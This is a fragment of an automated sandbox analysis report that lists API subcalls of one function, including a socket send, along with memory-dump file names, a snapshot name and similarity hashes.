                                                  • Part of subcall function 004023C0: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402427
                                                  • Part of subcall function 004023C0: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402431
                                                  • Part of subcall function 004023C0: send.WS2_32(?,00000000), ref: 0040243B
                                                  • Part of subcall function 004023C0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402492
                                                  • Part of subcall function 004023C0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 0040249B
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040206E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@A?$basic_string@V01@@$?data@?$basic_string@?empty@?$basic_string@D@1@@V01@Y?$basic_string@send
                                                • String ID: [INFO]
                                                • API String ID: 868658090-4019176272
                                                • Opcode ID: d4748d1cf223dc65867f475122c413e2bc6232920193d0c3f3ac1a027aeefcc1
                                                • Instruction ID: 4a8750b78b6402e6d0e43a4049bcdd65855c6e5bd4c2de757a553f2e6024edcb
                                                • Opcode Fuzzy Hash: d4748d1cf223dc65867f475122c413e2bc6232920193d0c3f3ac1a027aeefcc1
                                                • Instruction Fuzzy Hash: 38D0123A500118BBCB007FB9EC098D97B28EB05765B40C465FD0587261EA36D62097D5